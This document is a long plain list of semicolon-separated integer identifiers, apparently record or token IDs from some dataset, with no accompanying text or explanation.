102451;97760;101616;100562;101617;99643;97363;99408;101618;105860;96501;97617;100188;100436;97364;105861;100361;105862;96783;97165;101619;99143;102717;103101;101620;100008;100074;101776;102386;102452;100309;99488;104598;103891;105863;105864;101621;105707;105200;103542;100332;105865;100437;101503;97033;104942;102184;102387;96358;97903;105512;96888;105866;104824;101537;101622;100742;102894;96987;102602;101863;104977;101623;101624;105867;104263;101625;100970;105868;102185;102895;101626;97425;102088;105869;105870;99924;101627;97166;101179;105871;100487;105872;101628;103334;104825;105010;105873;100743;103892;103543;101629;101630;102453;105874;97678;105875;102025;99409;101631;104416;101632;101633;101634;105876;99955;105877;100488;96889;104110;99239;103583;104445;105878;105879;99718;104152;97534;97805;101993;105880;97167;100605;101994;104794;101180;104826;99609;103610;102896;102484;103544;102454;100489;100009;99547;102936;101635;104978;104757;100310;103893;105881;101504;102388;104758;104195;97168;105882;96538;97169;101636;101637;103434;102983;97535;96934;101864;105883;100189;104309;102389;97703;105884;104310;96736;103894;100971;101638;101639;104599;101865;96737;101917;105885;101640;105886;105887;96784;100858;100190;99053;99144;101641;102455;101213;103895;102390;101995;100438;101642;105888;101643;100730;104727;103896;105889;101644;104153;105890;101866;102551;100822;97338;105891;101645;101054;97865;104689;105201;97245;101123;96935;101181;101646;103435;103335;100490;101647;105892;97806;100798;105893;104060;105894;102552;99054;103263;96936;97170;103897;103232;105895;103898;99319;101648;99257;103117;105896;102391;96988;102794;105897;102247;105898;101649;99489;101650;100626;102392;97171;100228;101069;104728;102897;101651;105899;96539;102456;105900;100744;101505;99678;101652;104111;100191;105011;101996;97679;96890;96891;105446;104406;101653;99697;100563;103899;97704;104311;101243;97453;104600;103611;101963;101506;105901;99272;99145;102393;101654;101655;101997;99175;102827;99445;101656;99410;105902;101182;103612;101998;103264;102718;102047;104827;99719;101657;101507;101999;101214;101327;105903;103336;103393;102603;101658;96617;101659;103150;105904;97454;105447;105905;97866;97310;97867;105906;96937;102898;105202;102000;105907;101660;101015;101661;99146;101508;105908;105909;103664;99989;101662;100192;103545;105910;101663;101664;99176;105911;105912;96359;105129;104312;96468;105474;103546;99411;105913;102328;101918;102394;96573;96892;96321;102100;99610;105130;102937;105914;105915;100606;103199;100030;97785;100745;100193;99205;100823;101665;101796;97172;103547;101666;104729;105131;96893;102212;100311;105519;104711;97069;104601;104345;99644;101667;103265;105475;101668;105916;101669;102001;101670;105917;96894;105203;100010;101671;104417;101672;105918;102604;97646;101673;96738;96502;100746;101674;97926;102984;100972;97482;104154;105919;97501;99412;97246;105500;105920;100491;104795;102275;103233;101675;102605;103102;105921;100824;102457;105922;104196;96503;100731;101070;101676;101677;99679;101678;97705;96895;104225;103900;103901;103613;105923;105924;105925;101679;103902;105926;105927;100564;97590;100229;101680;102795;102458;104469;101681;96966;104264;104602;104603;100492;101682;102770;105928;99611;101683;102395;99424;100607;102002;99413;102026;96540;103314;102485;103997;100493;97365;105012;103103;99680;103436;104979;105929;99010;102396;102027;104446;102828;97969;102459;101867;104447;100194;100859;105930;97173;102606;97786;102397;105204;99177;96847;102003;102004;100333;104418;100011;102486;104419;101685;101684;97536;105931;96504;104796;100312;105932;99191;99320;102829;99414;99055;103437;101686;101919;102899;105933;100494;101920;102900;97618;99744;99321;105205;105934;99490;100195;103548;97706;104690;104691;97591;97502;105132;99745;103998;103549;105935;101687;97426;101868;101688;104313;105936;99612;105937;100075;97868;104604;103614;96989;102398;101777;103903;101778;99056;105938;105939;105940;101689;105013;97970;104112;102028;100076;104448;103234;105941;102607;104155;97070;101244;101690;105942;103200;102608;105943;105133;101691;101215;99491;101692;103151;100732;100825;101921;101509;105944;101693;104314;103521;101694;97619;103438;105945;97247;102487;101695;103950;99681;101124;102985;100077;101696;101697;101698;96896;101779;101699;101700;97339;100230;99548;105946;105947;97537;102005;105382;103550;105948;102609;105949;97680;97174;103235;99273;101701;96967;102213;104828;105950;100747;97427;105951;104197;100196;105952;100733;105953;100334;100078;100973;97503;97841;102488;97034;99415;102719;104156;100079;100197;97681;96676;102089;101869;105134;102460;105954;103337;97483;104346;101071;105955;101702;97428;102461;105956;100608;105957;103551;105958;104980;97175;99258;97248;101183;104605;105959;101703;105960;105961;99645;105962;101704;97761;105135;101538;101705;101706;101707;99057;104157;103338;102938;102399;101708;99549;101709;105963;97176;101797;101510;102796;102400;96677;103904;100080;101710;102276;103439;97561;101096;105383;101711;97429;96707;99416;105964;101712;96897;101245;97647;103118;103339;102029;101713;105965;97648;97538;104449;101714;105334;102048;97927;97071;104606;101870;103037;102830;99492;97455;105476;97311;102808;102489;105966;101328;97539;97249;97682;102901;103665;99613;104158;101715;97177;105967;96739;97869;97340;100734;99746;99147;102006;105968;105969;102720;105708;104159;96678;100012;101072;101028;105970;97620;100495;96574;96990;105971;105972;104607;102610;104450;101716;103340;96360;105206;99493;103104;97649;101717;104730;96848;101718;104315;100627;103615;102214;100031;100013;105973;97621;103366;97178;103201;103905;100198;105974;102721;105207;97683;102401;103951;103266;105975;104160;105976;96785;96849;105977;100032;101719;101922;96679;100335;105978;97622;103906;101720;97971;101721;102186;104451;97179;100199;101780;96505;105136;105979;97762;96968;102402;99322;102007;101964;105980;105981;105384;101511;103616;100231;104608;105982;104829;101246;105983;97540;100033;96361;97541;106077;101184;102403;97763;102404;99148;103952;105984;101512;97684;96898;103367;96680;101722;100826;101329;105985;101871;101723;99494;104347;97430;96740;101724;105986;99720;101725;101726;101727;97250;105477;97504;101728;101729;102507;103236;105137;101037;101730;101731;101732;97505;96991;101733;100439;102490;99614;100281;101734;99721;105987;97870;99550;96469;97764;104830;97341;100336;102632;100860;101735;100440;96969;104609;101923;97072;103105;104831;97842;101736;96681;103394;101513;103341;105385;99446;104610;105988;99108;99323;100748;103552;101737;103267;105989;104981;103268;101185;101738;102136;105990;102215;101965;102831;96708;97707;105386;100735;101872;96506;105991;101739;105014;100337;103269;96362;105992;101740;97787;97180;101741;96507;99925;101038;101216;101742;101781;97542;101743;105993;105501;105994;103617;100338;100749;104407;105995;103440;100362;104692;104316;100750;102277;99324;104832;103342;99447;100014;100034;101744;101745;102049;99495;102329;105996;99747;104505;105171;101873;103907;97055;102832;105997;101039;105998;102986;105999;104452;101746;96470;106000;103618;104833;102405;102248;102462;103908;105208;103553;103106;106001;102463;101782;106002;102686;102722;97685;97623;106003;100363;100200;104161;96508;102464;106005;106004;104506;106006;102902;97456;102406;104834;106007;101874;100736;99425;105138;101247;102611;106008;106009;101747;97181;102612;103107;106010;105736;103619;96899;102050;100609;96682;101748;101783;102613;106011;102008;100751;101749;101750;97543;105139;102614;97624;104943;106012;101751;103554;97484;101514;102903;104611;100705;100201;106013;106014;97182;101752;101875;106015;97056;100364;106016;101753;96509;97686;106017;102137;101754;106018;102723;103108;102009;99748;101755;103202;102407;99149;106019;106020;101756;101757;96741;109350;108305;120199;120200;120202;120201;108306;110573;107153;108612;117891;120203;120204;108790;108907;120205;106611;108423;106987;120206;120207;106021;120208;111235;111766;120209;109559;106022;120210;107154;120211;120212;120213;108491;111469;120214;120215;120216;120217;108492;120219;120218;106905;108665;120220;110299;120221;120222;109817;120223;120224;110625;117813;110425;106906;108732;108855;106698;120225;110667;106634;120226;120227;109702;108666;120228;107155;120229;120230;106416;117488;120231;106274;120232;120233;109818;120234;120235;120236;107156;120237;120238;110597;120239;118072;120240;120241;118100;120242;117716;108908;120244;120243;108909;120245;109703;120246;110574;108977;120247;118409;107107;120248;110613;120249;120954;120250;108493;106110;120251;109704;108613;120252;120253;120254;120255;106078;120256;117925;108268;120257;120258;119106;119154;120259;108494;106417;111236;120260;120261;117531;120262;120263;120264;109004;108910;108667;120265;109705;120266;120267;120268;120269;107157;111767;109221;120270;120271;120272;107158;120273;120274;120275;108614;120276;117959;109094;108699;120277;120278;120279;120280;110387;117960;108668;120281;118159;120282;120283;107280;120284;107159;120286;120285;105709;120287;106023;109416;107160;118045;120288;106177;120289;120290;106988;106024;120291;109706;117371;120292;109819;120293;106510;120294;120295;120296;117646;120297;110166;120298;120299;107007;118334;120300;120301;106275;110300;120302;120303;120304;120305;106025;120306;120307;110689;111799;117372;118896;120308;119107;106821;120309;108495;120310;108347;120311;112067;109740;110821;106322;120312;120313;120314;108307;120315;110949;120316;120317;106822;120318;118857;120319;111558;120320;120321;110912;107161;118160;120322;120323;107027;110690;120324;111619;120325;120326;120327;108911;120328;110626;120329;120330;106511;120331;107162;120332;120333;106730;106418;120334;120335;120336;110698;118897;120337;109434;120338;120339;108836;109285;106907;120340;118579;120341;118841;120342;117717;120343;111237;120344;120345;120346;109820;109590;121072;120347;120348;120349;108856;120350;108615;120351;120352;110627;120353;108496;120354;120355;112169;106908;107281;119126;120356;120357;111238;120358;120359;117438;120360;117961;120361;120362;120363;120364;107028;117926;120365;120366;120367;120368;111397;117927;106823;105710;120369;120370;120371;120372;109048;120373;120375;120374;120376;108775;117507;107125;118940;120377;107029;111239;106026;120378;120379;109095;120380;107008;120381;108818;107030;120382;106594;120383;117718;110388;108616;120385;120384;117489;120386;110426;108617;120387;119155;109873;109821;106079;108669;120388;106824;106419;120389;109741;110930;120390;106027;106512;120391;120392;120393;111539;120394;120395;117647;117532;109005;120397;120396;120398;120399;120400;119156;120401;120402;120403;109096;119243;120404;120405;120406;120407;120408;111710;120409;109286;107163;106028;120410;119291;120411;120412;120413;117299;120414;107164;120415;120416;106635;108497;119244;120417;120418;111470;107138;120419;120420;120421;111047;120422;119127;108837;110913;119055;120423;120424;120425;120427;120426;111240;120428;106029;109874;120429;120430;120431;120432;120433;118101;120434;120435;106909;107165;108424;120436;120437;108498;118941;120438;120439;119245;120440;110400;120441;120442;109150;106057;106782;120443;109222;109351;120444;120446;120445;120447;107166;109707;119007;108499;107167;120448;106058;120449;120450;107009;120451;106825;120452;120453;120454;110167;107168;120455;120456;120457;109708;120458;120459;120460;120461;117892;120462;120955;120463;110168;107169;109519;106910;120464;109560;120465;108670;117439;120467;120466;120468;120469;120470;111398;111241;120471;120472;120473;120474;120475;106276;110209;120476;120477;109417;120478;120479;111242;118102;106513;120480;120481;108308;106514;108500;120483;120482;110575;120484;120485;120486;106030;120487;120488;120489;120490;120491;120492;106515;106178;110931;120493;117962;120494;120496;120495;120497;117839;120498;109970;120500;120499;119108;106080;120502;120501;120504;120503;120505;120506;110251;120507;110538;106277;106081;106420;120508;120509;120510;108618;120511;109520;110301;120512;120513;117840;120514;120515;107031;120516;108912;111399;111711;110252;120517;120518;120519;108425;109561;120520;109352;120521;120522;120523;106636;120524;120525;120526;120527;112098;120528;106516;120529;111522;120530;109926;120531;120532;120533;120534;106278;120535;120536;117300;120537;120538;120539;108776;110520;106279;120540;120541;109287;120542;117814;120543;120544;106323;120545;108309;120546;120547;120548;110427;106638;106637;110822;117648;112099;106538;120549;120550;120551;106989;120552;120553;120554;106731;111400;120555;118475;108777;120556;120557;106539;110169;120558;120559;108501;120560;120561;120562;106990;118103;120563;120564;106540;111015;106031;120565;120566;106878;106032;120567;111712;120568;120569;120570;106826;110327;120571;109006;120572;109562;117490;120573;120574;120575;120576;120577;111471;120578;107032;120579;111243;120580;120581;110598;106517;118809;120582;120583;110668;120584;111620;111559;111768;111472;106518;120585;120586;120587;109742;108502;109822;120588;120589;109743;120590;120591;112100;120592;118046;120593;117508;108269;109353;120594;109563;120595;120596;108503;106519;120597;120598;120599;120600;120601;106911;120602;110401;120603;120604;106280;120605;120606;106281;112051;120607;120608;105596;120610;120609;107170;110428;106912;120611;111244;120612;120613;120614;106082;120615;106282;120616;112068;120617;107033;112234;120618;118960;108388;109288;120619;120620;110950;105737;121073;120621;109823;120623;120622;109971;120624;120626;120625;111048;120627;109824;110170;108504;120628;118047;120629;106179;108913;110932;120630;120631;118842;108505;106639;120632;108619;120633;120634;120635;120636;120637;120638;106640;109018;106283;109382;120639;107077;120640;109875;120641;110253;111016;120642;120643;120644;120645;120646;108914;120647;117963;120648;117841;120649;120650;109223;120651;119157;120652;105624;111473;120653;110914;110060;107171;118123;120654;108506;109354;110210;120656;120655;110576;110061;120657;106033;111475;111474;120658;110951;120660;120659;108426;108915;120661;108572;120662;120663;106827;106641;118314;109709;107010;120664;117440;108838;120665;117612;106642;118410;120666;120667;108348;108778;109435;110669;120668;111713;117373;108733;110389;108734;120669;120670;120671;120672;120674;120673;120676;120675;120677;120678;108857;120679;120680;106828;120682;120681;120684;120683;120685;120686;120687;106520;120688;120689;120690;106421;120691;107172;120692;109803;117374;109418;120693;106913;111989;120694;108916;108671;110823;120695;107173;120697;120696;111245;120698;111361;120699;109591;106914;109564;120700;106083;120701;108791;120702;120703;120705;120704;110402;120706;108389;120707;120708;120709;120710;120711;120712;118104;120713;109151;120714;108672;106915;120715;120716;107034;106084;120717;118580;120718;106284;109224;107011;120719;120721;120720;106937;107174;109225;120722;120723;120724;120725;106285;110577;110788;106643;120726;110670;108735;120727;120728;119158;118241;109419;120729;109903;120730;107175;120731;109420;120732;105738;120733;120734;120735;120736;118181;110789;110790;120737;109710;120738;108673;117622;108700;111714;110302;120739;120740;120741;117509;120742;118242;120743;120744;120745;106111;120746;120747;118243;108390;120748;106644;109972;109711;120749;120750;120751;120753;120752;120754;120755;108427;120756;120757;106541;110171;120758;120759;120760;117842;107035;111476;108779;108736;117375;117719;120761;120762;120763;120764;120765;110933;120766;120767;120768;117843;111401;120769;120770;120771;112101;108839;110671;106112;105711;106085;120772;107036;107176;106542;108349;120774;120773;120775;120776;107012;120777;108917;120778;119019;120779;120780;120781;120782;120783;120784;120785;110952;110172;120786;120787;111990;120788;120789;107037;120790;120791;106465;120792;120793;107013;108310;120794;120795;120796;118843;109876;120797;106645;120798;120799;111246;110672;108674;120800;109152;120801;120802;120803;109226;120804;120805;108428;109744;120806;108675;120807;120808;106086;112186;119020;120809;106595;120810;120811;106646;111247;120812;112235;120813;106113;110328;120815;120814;117964;109592;120816;108311;108780;106180;120817;120818;120819;120820;120821;120822;120823;120824;120825;106829;109049;111477;108701;106466;118244;118725;118245;120826;120827;108918;111769;120828;110173;120829;120830;108312;120831;120832;117720;109421;108620;108978;120833;106596;120834;109189;120835;111770;108313;120836;109973;106568;120837;110824;106286;120838;106958;120839;120840;110599;119159;120841;120842;109804;106521;108573;119128;111715;117533;120844;120843;120845;120846;120847;108737;120848;120849;120850;106783;110673;110103;118335;120851;120852;120853;108676;120854;108792;120855;120856;108919;120857;106991;120858;106114;111654;111621;111716;120859;107038;107177;106422;109712;120860;109825;108677;120861;120862;120863;109927;121074;118048;109805;120864;120865;120866;108920;120867;120868;108702;109745;110303;120869;106034;109422;120870;120871;120872;109423;107282;120873;110329;120874;111717;111017;119008;120875;120876;120878;120877;111718;120879;120880;109746;111719;120881;111595;111248;120882;120883;108921;106830;117510;110273;108819;120884;120885;108350;117965;111560;106992;120886;120887;107039;120888;106647;120889;120890;120891;120892;120893;106035;120894;120895;120896;117534;120897;120898;120899;108621;118898;120900;108678;109747;120901;109436;120902;118581;111249;120903;120904;118899;120905;120906;120908;120907;108622;120909;120910;120911;120912;120913;117491;120914;108922;107040;120916;120915;120917;120918;120919;120920;109227;120921;120922;120923;120924;106648;120925;120926;106423;120928;120927;120929;120930;107108;109748;108507;120931;110915;106784;117301;112102;111250;108679;120932;105739;119009;106522;109928;120933;111251;110674;110211;120935;120934;119129;120936;117302;120937;120938;107041;120939;120940;120941;120942;120943;121332;122650;129319;129508;127502;131194;131785;124369;131195;121137;130291;128431;131332;125931;123098;121235;123472;127103;122555;122978;125228;130032;129829;121373;124465;120964;131706;132636;125418;130775;124346;131440;130033;124466;127869;125486;124467;124468;122273;125177;131196;123137;122103;121487;129599;123033;128561;120965;126353;131786;125419;125838;122274;128084;122070;129600;122830;122556;132778;129601;131707;125645;121442;123034;129602;128562;124469;122039;122623;130475;125420;124470;130613;130776;125646;129603;126130;129077;124471;124599;131088;128126;132637;123035;123693;130777;121075;130778;132638;123801;129604;131787;129394;125375;124472;123036;126706;123759;124473;125906;127503;131441;124474;124475;129830;126794;131573;129320;125421;128432;122979;129540;129170;122520;122275;131839;126411;130919;122436;125422;130986;124723;127870;125647;131442;131089;130779;130476;126591;121138;125648;131443;124684;122769;131708;122276;121169;132111;131333;123534;124685;126225;128396;126131;129417;127931;129698;124308;122795;130780;127932;126014;129078;132639;124476;124724;123568;124477;124478;130477;132112;124284;129605;131250;128563;128480;125610;129606;122071;131251;122354;125229;130409;126795;125271;121258;125860;129607;131252;131444;126796;130292;132779;124600;122557;131840;130781;128039;129608;130478;129609;124244;130293;128397;125932;123099;124479;130294;129949;121076;124040;129610;125423;128535;124480;124781;132640;129612;129611;125743;124207;123802;131253;133111;124699;127504;124347;125649;129027;128564;128127;126354;125178;123037;131090;122558;126055;125611;129028;124481;122725;132641;127505;124482;121318;125785;128398;126355;124483;122559;126797;132642;131037;123569;124484;124485;128128;124177;125179;125744;121139;129613;123535;124660;131254;122651;122437;124348;129418;132407;126015;125745;128885;122104;129419;123760;122105;121170;125907;127506;123473;121194;131334;130782;122277;123570;128129;122455;132348;124041;128433;125960;131143;121443;128434;127507;129950;124725;125908;122406;123038;131709;128399;132083;132643;123803;122322;129509;124486;130295;123138;125650;125230;121444;128744;123474;122456;129079;127104;131445;132027;122278;127508;130296;131446;122796;122880;122652;124349;122197;127509;123694;124487;131447;125424;122407;124488;129951;121519;131788;122040;131789;129767;130479;124489;121236;129614;125425;130297;131038;124490;126356;121333;124285;122106;129395;132644;127871;128400;124491;128565;122279;131710;132028;130410;131091;122681;128566;132645;123761;129615;125318;125180;130783;127824;125684;131574;132646;128130;128652;130411;129736;126798;130298;128295;129080;131168;129616;126969;128481;130299;129541;121319;125231;121077;122408;122409;124350;129699;122653;129617;129618;121217;122410;130300;121237;129831;122134;124492;125319;124601;131197;125651;122072;130034;129700;126530;128401;132327;124493;122438;126132;127510;121259;122654;124494;128040;124569;130480;126799;122624;128784;128567;122560;130301;123100;128785;127511;130784;121260;123139;125861;130987;127933;127512;132737;121374;130614;128568;130481;128131;128435;125652;122980;131199;131198;128296;124726;129420;128132;122355;130785;129321;128786;126970;128623;127872;125181;129029;128569;129619;126800;125426;131711;125427;132647;132648;127934;129171;127513;122561;127514;127935;124495;129109;129620;123039;124496;124570;124497;127079;125653;128787;125654;125909;124782;128436;129510;125182;129621;128570;125272;131092;127936;131790;124245;123040;131039;131335;131448;131791;130074;128571;123839;129511;124498;124499;130075;132328;124500;126357;131093;128788;129542;130786;129622;122198;130302;129623;130920;129624;125786;132408;126449;127825;122682;122323;128133;124370;130237;131169;132113;132649;124501;126515;123475;123476;131200;127515;132329;126016;122797;129625;122280;131094;129626;122073;124502;130370;131336;131255;125299;123140;126516;124783;126838;131449;128624;121577;131040;132114;129627;130303;124503;126358;128402;122981;122281;125428;121488;130412;123477;132780;131792;124504;127937;130787;124505;131450;122135;130788;131041;131741;131144;122521;131201;129366;122881;130789;131793;130352;124371;130304;130790;124506;121140;122282;122136;125862;131337;122074;126658;124507;123041;127516;124208;128572;124727;124178;131095;130305;131145;125655;130988;132651;123571;124427;123804;131096;132652;128482;130989;122439;122625;127517;130306;124508;124509;126517;122982;130482;122440;131146;132650;131097;123572;122798;122522;121578;125273;124510;124511;131256;126659;122075;124686;121579;122076;125746;132781;131451;128573;129628;131452;129832;121334;126518;130791;128574;127518;129367;125656;131712;125429;123805;128085;131042;124571;122283;122284;127519;122655;124512;125863;124513;126660;122371;130307;125430;131043;124372;120966;130308;123042;125274;124514;121401;131098;132029;129081;132115;123762;127826;131841;124516;124515;123478;124572;122726;131453;129629;125864;123101;132653;129630;124066;129543;125275;130483;126839;129631;129632;126412;121078;128297;129030;129421;132116;129633;131202;125787;122285;123043;121238;122286;124042;131713;121079;131203;128483;122077;129802;121080;131454;131967;126359;130035;121195;121489;128134;124573;131338;130615;126017;122983;131455;121320;126531;128789;121375;128041;131170;121081;125183;131456;124043;124517;129322;131171;131714;129323;124373;124518;128790;122356;128484;124246;129952;122078;121580;128575;124519;121261;128485;122562;121445;126994;130484;127938;132654;124520;130485;127939;125300;123141;130486;121141;129634;129368;127520;130309;122626;131044;129635;128886;130616;127105;131204;132084;129953;122107;124428;132117;127080;126080;127521;125910;123479;124010;128978;128625;129636;121262;124521;124522;127081;124523;123763;127940;125376;126264;123840;130487;129637;125685;121321;121490;122079;124700;123142;129638;124524;125612;129544;124574;125911;122287;121322;132782;126661;126995;124525;130488;130310;132783;132118;124351;124011;130311;128576;123764;132655;129512;129324;122523;121263;124602;123806;131257;129325;124247;131339;124661;124526;127873;129639;121082;126265;126313;130312;127522;124603;130489;122108;121239;132784;126801;124527;127523;123044;123045;121264;124528;121562;128437;121520;130792;130490;129422;124529;121083;129082;132656;132270;129640;130313;130314;128577;129110;123536;121265;126360;122627;124530;124531;126314;122288;122411;122628;130793;122457;124532;127524;121171;130036;131715;129833;121266;129701;129641;130491;131099;128486;121267;129642;125377;126532;124067;122563;129834;121376;131716;129643;124604;129326;123537;124179;129083;124533;125933;126662;131100;127525;121268;126056;124180;131457;125431;123143;125657;130315;131742;131842;130316;125686;124701;121402;129644;130317;121563;131101;131458;124784;128578;124248;126663;124575;124534;130990;129031;123046;129645;129702;128791;131045;129835;125747;131968;123841;122984;128067;125320;127526;123047;122934;131258;131794;130794;125865;131102;129646;128487;124535;125658;131103;125961;128579;127527;123765;125866;130795;125748;126133;124068;124536;124249;127528;125232;132657;121084;121085;129478;130037;122564;121491;123766;122565;121323;131717;122799;124576;132030;127529;132409;128488;121377;124537;122289;132119;123048;129647;122800;130318;127530;127082;124538;131459;124539;124785;122566;124540;130319;125487;127874;122357;124786;131460;128745;131718;124044;131205;129032;123480;131104;124541;122041;128792;124250;130320;123807;128793;123979;130321;128626;124702;129648;130796;129327;121086;130797;130322;129649;129650;129836;122683;130798;124687;125867;120989;127083;130492;123049;124542;122935;130799;125432;125962;127875;130076;121269;129513;131105;125613;128653;124251;124605;124543;126018;125233;129651;122164;126483;121581;127531;125788;122080;130800;129768;130493;121492;128794;131575;129652;124544;128489;126664;124577;128580;130323;125378;124045;126361;122458;127084;132658;129653;124069;123573;131106;131461;132659;121582;129803;131046;131462;125868;124545;131843;127941;129769;122199;125184;129654;122290;132120;122567;128581;132660;128582;122629;122324;129655;132661;129837;126802;125912;124787;124546;125710;122200;128583;129033;127532;123695;125433;122568;129034;123050;124548;124547;127085;124012;125659;131969;126803;130801;130802;131172;124549;124550;129737;122684;126707;129857;124551;122081;127533;125185;121196;121270;130324;124606;126134;131463;121271;124552;123051;131107;123538;130803;131464;132662;129703;127534;121142;122985;130804;129858;131465;122082;126533;124553;129656;131206;125186;129035;124554;130325;124688;129423;125434;129657;127535;122524;124578;131047;129111;121446;124555;131108;122137;127942;122862;127536;125789;125660;127537;122569;130991;122727;132785;130326;122083;122882;125276;125661;130327;126996;129424;125277;132663;123052;126665;130137;128490;124252;125790;128438;122138;131147;122358;129172;131259;132664;129658;122986;121493;124703;132786;124556;127538;130038;121197;126840;126804;125435;124607;125436;129112;125869;121218;127943;124352;125234;131207;124181;120967;127944;131048;126362;123808;129113;124689;121198;121494;125870;124557;125321;124558;122728;130328;126226;123767;122139;129770;126805;130353;124559;125345;124728;129659;129660;124876;126135;122656;137920;143353;140542;133008;137786;142228;139554;133701;133420;141489;139100;139879;134184;140543;137102;141879;137103;137921;136677;141756;137922;138820;137210;136148;135367;137787;140759;138069;143307;133881;135368;141873;142291;133563;143255;140544;134127;134455;140545;137923;144618;134919;136149;140760;133231;134578;137211;140226;143177;136414;144963;142045;144488;137156;133817;134456;136293;134985;138821;134128;141870;138396;133775;134986;133818;134882;143176;134435;137420;144834;135985;137104;137105;137842;137924;137677;140227;142587;135369;139676;142356;141874;143291;140063;135986;140668;143137;142586;141269;142857;136432;135726;140618;134684;144546;135418;139256;134920;140546;138397;138398;140105;144612;139705;134457;142520;138861;134987;137379;133112;142197;138530;136150;142527;143330;137732;141522;133659;135419;135987;135420;141510;138108;141282;142957;132787;136678;139343;137106;133421;139706;141384;136151;133702;134185;141245;133564;141881;138109;144615;133422;145016;140812;137380;136433;133423;141186;136531;134246;141277;143326;137107;134247;133232;140813;141283;143173;135988;143598;140761;135209;133882;139299;134129;143405;133626;133627;142182;138399;137788;144031;139431;135104;134988;136434;141900;143139;136294;133565;132876;143183;134130;142927;134248;134096;144828;135989;136210;139931;136953;133883;137678;137679;133735;134989;139707;136838;133367;144669;143171;143325;139677;138400;143140;137108;141289;133368;141280;139257;142668;134249;137680;133369;144347;144183;134131;138822;141520;139212;143344;135105;135990;141270;144957;140669;143458;139880;134250;134186;138110;142624;133819;139586;138531;134132;144135;140547;137574;142581;133566;137421;141876;140619;138235;137422;136435;136592;140506;136532;137423;138476;136377;137733;140670;133567;137109;138111;136839;141139;143149;137110;141317;134990;144246;138532;143106;138401;136415;140620;134187;141887;141909;137111;138163;143356;144536;143227;135991;133424;136934;134458;138653;137112;137157;134991;134961;133568;140608;133736;142160;140304;137158;139778;134251;134436;137159;143189;133113;140548;144124;141880;137925;139632;139678;139258;141299;139881;135421;138823;143261;133569;142338;142637;141486;133884;135992;139633;138915;140621;141267;133009;134579;142283;143294;142666;133703;133570;142617;138193;134685;133010;144830;138477;144319;140622;133885;144163;134635;136935;139679;141285;133737;136211;141555;142955;139259;134133;142517;138824;137113;137424;142580;141296;143464;143515;139101;134134;138654;133571;135106;141892;139102;143436;137009;137926;140671;138478;142669;143196;142835;138402;133886;139634;142518;134992;137010;141300;137765;138112;138916;134354;144038;138366;139432;142614;134333;141902;137114;136436;133114;132788;133572;141896;133233;140623;144479;135370;137160;139390;136378;136722;135727;138862;144487;137681;133776;139708;133887;137425;133660;138917;133234;141518;136988;138403;140672;142541;137843;137865;132738;142564;141907;144325;135993;138825;140228;144701;144611;133011;136295;144717;139260;133573;133888;134097;132789;133012;144654;135260;133535;136379;136152;141485;144132;135711;142947;140549;136593;133235;136954;137866;143334;135210;142621;134840;133425;137115;133426;144482;133236;137212;137682;143135;136679;141268;133777;144225;134252;136755;134841;138579;140305;135597;138863;134883;138404;135422;133115;132877;132739;136296;141894;140229;135598;140106;143293;140230;133574;142013;138113;133575;139523;141527;133576;138533;141882;134993;137426;134135;138864;134055;141140;136437;143129;141187;138194;144134;135371;141273;141509;135211;144030;134459;141524;139761;136723;144500;141274;142533;143351;139587;138865;140673;133443;141141;138405;141142;136936;144129;137116;136380;134136;135372;133013;139932;139882;134842;141930;139736;133704;134188;136381;142205;142841;139344;136153;133889;136680;144730;141188;138406;141101;138826;134580;142847;137734;141908;136840;136841;136681;133116;133577;136632;139261;139213;137161;133578;141875;140624;143188;142171;137844;134884;134137;135994;139345;136779;136594;141515;140550;142193;137867;138866;135212;144617;139555;142542;142040;140762;141189;134253;138195;143300;138114;138479;143258;138196;144827;136704;133778;139103;139524;144117;141298;140064;142532;139680;136937;134138;134460;134139;134636;141490;133779;144136;142229;133370;143465;141895;133738;136212;141526;142954;138480;142192;133371;136842;139104;141143;141190;137117;132790;140551;141295;143516;141376;133427;140438;142622;139681;137927;140306;138236;144736;133237;136297;135995;141903;141885;139214;133372;135599;139635;143309;142919;137118;137575;137683;140507;139262;137162;141556;134581;137011;140674;134461;141869;140552;138237;142569;138115;139105;144039;133428;136382;143329;142552;134994;138164;144440;138238;139433;133238;141275;136780;140553;134056;137427;141290;138070;133739;133014;136724;141144;140307;144475;144486;139883;139263;138239;134582;142198;139636;137766;135600;144140;141392;139391;134637;140308;132791;136682;134638;136683;133579;133117;142830;137428;144481;137684;134995;142887;133580;134583;144040;136781;138407;139392;139215;138408;136843;142529;133373;135213;141795;142860;143502;133015;133705;137429;136705;139346;137845;133890;144166;141484;133016;136684;141145;137119;138918;137685;144489;138409;134462;135996;136844;144310;138240;143098;140471;139709;136756;133581;140554;135601;142851;141928;136298;133239;143105;138580;139884;136938;140675;143349;135712;144342;139637;137846;140508;133820;144045;144616;142636;139710;144042;134463;140763;133582;141248;139216;142886;133429;141244;137735;144362;136845;141532;141297;133628;136299;134140;144091;134996;134057;137120;139106;135214;134334;144652;137430;133821;135602;140814;142351;144123;137686;133118;140309;133512;141519;139217;139525;135423;142051;138116;139762;143525;144474;142016;141375;136939;136725;139682;144484;143346;141889;136846;141877;140231;143530;136633;134254;136154;141550;136300;138117;141146;136989;139434;140555;137687;133374;133583;142862;133017;144835;136438;138410;144324;138534;134355;138118;144696;137163;137847;140815;133240;140232;135728;141488;143174;137736;134962;144241;138919;140107;136847;142837;138367;133119;139711;139712;136595;136416;133375;136301;142828;144822;142574;138655;133241;134584;141521;145017;142935;144175;140233;141278;132740;137164;144247;141386;140556;143228;139393;143111;140439;142515;137213;137121;143397;133584;139107;137214;135107;136439;139885;139588;143596;137215;138656;143434;133740;138241;136848;137431;136155;136685;135997;139737;141891;144577;144729;143354;134639;135998;139526;135999;133152;134997;133430;139108;133278;138242;138119;141871;136440;142914;140065;138120;133376;144613;143595;138867;142588;140816;136156;141381;142934;141906;136383;141487;144583;140625;139556;138920;133120;142104;135016;142048;140066;142047;138868;137868;137432;138243;132878;136000;137928;135424;137122;138411;138197;137433;144127;135215;134464;143520;134189;137688;143453;138198;138921;137123;144315;142928;143167;143501;142842;137434;138368;141554;133741;139933;136757;133377;142577;142839;139638;144542;133536;144480;137435;144323;142509;141883;139527;133018;138657;140676;137689;140108;133431;137929;134885;142510;140817;143195;133891;138121;143438;136417;144572;142671;133378;134717;135108;138412;137436;138369;134465;144036;133742;137767;138244;133242;141288;140609;134718;141102;136001;133892;139264;139713;134998;137576;133585;136002;138122;135109;141292;133743;133893;144606;136686;133586;138413;133379;137124;143108;142519;133706;136441;138869;136634;143296;137737;140557;138535;142859;144694;143230;136157;137437;135373;142195;134255;141249;141899;139265;137125;142191;139528;133587;143128;138581;153199;146397;145474;144967;147116;146363;145559;146296;145154;